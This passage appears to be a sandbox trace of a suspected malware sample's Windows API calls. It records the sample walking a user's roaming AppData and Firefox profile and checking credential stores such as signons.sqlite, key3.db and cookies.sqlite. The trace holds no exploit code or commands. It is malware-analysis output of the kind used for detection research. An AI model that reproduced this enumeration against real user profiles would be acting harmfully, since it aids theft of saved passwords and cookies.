ftLastAccessTime.dwLowDateTime=0xef111f10, ftLastAccessTime.dwHighDateTime=0x1d414e5, ftLastWriteTime.dwLowDateTime=0xef111f10, ftLastWriteTime.dwHighDateTime=0x1d414e5, nFileSizeHigh=0x0, nFileSizeLow=0x61cb)) returned 1 [0039.174] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37d850 [0039.175] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\extensions\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37d908 [0039.175] FindClose (in: hFindFile=0x37d908 | out: hFindFile=0x37d908) returned 1 [0039.175] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37d908 [0039.176] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\crash reports\\\\*", lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 0x37d9d0 [0039.176] FindClose (in: hFindFile=0x37d9d0 | out: hFindFile=0x37d9d0) returned 1 [0039.176] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\\\*", lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 0x37d9d0 [0039.176] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\\\*", lpFindFileData=0x1cc9c0 | out: lpFindFileData=0x1cc9c0) returned 0x37dab8 [0039.280] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x889889e0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x889889e0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x889aeb40, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x18)) returned 1 [0039.281] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\\\*", lpFindFileData=0x1cc460 | out: lpFindFileData=0x1cc460) returned 0x37daf8 [0039.331] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json"), fInfoLevelId=0x0, lpFileInformation=0x1cc6b4 | out: lpFileInformation=0x1cc6b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa2ba9a20, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xa2ba9a20, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xa2bbab90, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xbdb)) returned 1 [0039.331] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json"), fInfoLevelId=0x0, lpFileInformation=0x1cc6b4 | out: lpFileInformation=0x1cc6b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd150e220, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xd150e220, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xd155a4e0, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0xbdb)) returned 1 [0039.331] FindClose (in: hFindFile=0x37daf8 | out: hFindFile=0x37daf8) returned 1 [0039.331] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e3348a0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e3348a0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc0478a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0039.332] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\compatibility.ini" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\compatibility.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7b79aeb0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7b79aeb0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xbe55ec80, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xc2)) returned 1 [0039.332] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x851984e0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x851984e0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x86704ae0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x38000)) returned 1 [0039.333] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84f831a0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x84f831a0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc0478a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0039.333] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c6aeea0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x8c6aeea0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xd38df610, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x18000)) returned 1 [0039.334] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.ini" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x83553fa0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x83553fa0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x83553fa0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x87)) returned 1 [0039.334] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e0ad140, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e0ad140, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x83507ce0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x70000)) returned 1 [0039.334] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport\\\\*", lpFindFileData=0x1cc460 | out: lpFindFileData=0x1cc460) returned 0x37daf8 [0039.335] FindClose (in: hFindFile=0x37daf8 | out: hFindFile=0x37daf8) returned 1 [0039.335] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc1711ed0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc1711ed0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xe9dad5d0, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x118000)) returned 1 [0039.335] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\\\*", lpFindFileData=0x1cc460 | out: lpFindFileData=0x1cc460) returned 0x37dc68 [0039.336] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\\\*", lpFindFileData=0x1cbf00 | out: lpFindFileData=0x1cbf00) returned 0x37dca8 [0039.336] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\\\*", lpFindFileData=0x1cb9a0 | out: lpFindFileData=0x1cb9a0) returned 0x37dce8 [0039.371] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht\\\\*", lpFindFileData=0x1cb440 | out: lpFindFileData=0x1cb440) returned 0x38a7a8 [0039.372] FindClose (in: hFindFile=0x38a7a8 | out: hFindFile=0x38a7a8) returned 1 [0039.372] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1cbbf4 | out: lpFileInformation=0x1cbbf4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x881f23c0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x881f23c0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc51450a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x108000)) returned 1 [0039.372] FindClose (in: hFindFile=0x37dce8 | out: hFindFile=0x37dce8) returned 1 [0039.373] FindClose (in: hFindFile=0x37dca8 | out: hFindFile=0x37dca8) returned 1 [0039.373] FindClose (in: hFindFile=0x37dc68 | out: hFindFile=0x37dc68) returned 1 [0039.373] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e3f2f80, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e3f2f80, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc0478a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0039.373] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84d21ba0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x84d21ba0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc12c0e0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x39)) returned 1 [0039.373] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\minidumps\\\\*", lpFindFileData=0x1cc460 | out: lpFindFileData=0x1cc460) returned 0x38a5d8 [0039.374] FindClose (in: hFindFile=0x38a5d8 | out: hFindFile=0x38a5d8) returned 1 [0039.374] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7df7c640, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7df7c640, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xd17e1c40, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0039.375] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x835ec520, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x835ec520, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x739fa5b0, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0xa00000)) returned 1 [0039.378] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb4cc880, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xcb4cc880, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xcb4cc880, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0xe02)) returned 1 [0039.380] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe7e820, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xc06da00, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xc06da00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x11e4)) returned 1 [0039.381] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\search.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\search.json"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86d6a600, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86d6a600, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x86ddca20, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x4153)) returned 1 [0039.382] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e2e85e0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e2e85e0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x7e3348a0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0039.383] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe9c30810, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xe9c30810, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xe9c30810, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x24b)) returned 1 [0039.424] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe9c30810, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xbf3cf00, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xbf3cf00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x24b)) returned 1 [0039.424] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86ddca20, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86ddca20, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x8817ffa0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x50000)) returned 1 [0039.424] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\times.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\times.json"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7b79aeb0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7b79aeb0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x7b79aeb0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x1d)) returned 1 [0039.425] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8868ee60, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x8868ee60, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xb486c00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x9a)) returned 1 [0039.425] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webapps\\\\*", lpFindFileData=0x1cc460 | out: lpFindFileData=0x1cc460) returned 0x38a830 [0039.425] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webapps\\webapps.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webapps\\webapps.json"), fInfoLevelId=0x0, lpFileInformation=0x1cc6b4 | out: lpFileInformation=0x1cc6b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9f40760, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x9f40760, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x9f40760, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x2)) returned 1 [0039.427] FindClose (in: hFindFile=0x38a830 | out: hFindFile=0x38a830) returned 1 [0039.427] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86e4ee40, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86e4ee40, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xd3d7c0b0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x18000)) returned 1 [0039.427] FindClose (in: hFindFile=0x37dab8 | out: hFindFile=0x37dab8) returned 1 [0039.427] FindClose (in: hFindFile=0x37d9d0 | out: hFindFile=0x37d9d0) returned 1 [0039.427] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles.ini" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), fInfoLevelId=0x0, lpFileInformation=0x1cd6d4 | out: lpFileInformation=0x1cd6d4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7b79aeb0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7b79aeb0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x7b79aeb0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x6f)) returned 1 [0039.427] FindClose (in: hFindFile=0x37d908 | out: hFindFile=0x37d908) returned 1 [0039.427] FindClose (in: hFindFile=0x37d850 | out: hFindFile=0x37d850) returned 1 [0039.428] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mxr6.swf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mxr6.swf"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58ef9800, ftCreationTime.dwHighDateTime=0x1d41aca, ftLastAccessTime.dwLowDateTime=0x56f08a90, ftLastAccessTime.dwHighDateTime=0x1d41562, ftLastWriteTime.dwLowDateTime=0x56f08a90, ftLastWriteTime.dwHighDateTime=0x1d41562, nFileSizeHigh=0x0, nFileSizeLow=0x6fd0)) returned 1 [0039.428] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\nIGxj2X.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\nigxj2x.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe882c100, ftCreationTime.dwHighDateTime=0x1d41f8d, ftLastAccessTime.dwLowDateTime=0x199d00d0, ftLastAccessTime.dwHighDateTime=0x1d41bb4, ftLastWriteTime.dwLowDateTime=0x199d00d0, ftLastWriteTime.dwHighDateTime=0x1d41bb4, nFileSizeHigh=0x0, nFileSizeLow=0x165b7)) returned 1 [0039.428] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\OaY7e6g1t_2dY.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\oay7e6g1t_2dy.rtf"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x17138160, ftCreationTime.dwHighDateTime=0x1d415c2, ftLastAccessTime.dwLowDateTime=0x98212620, ftLastAccessTime.dwHighDateTime=0x1d41cb3, ftLastWriteTime.dwLowDateTime=0x98212620, ftLastWriteTime.dwHighDateTime=0x1d41cb3, 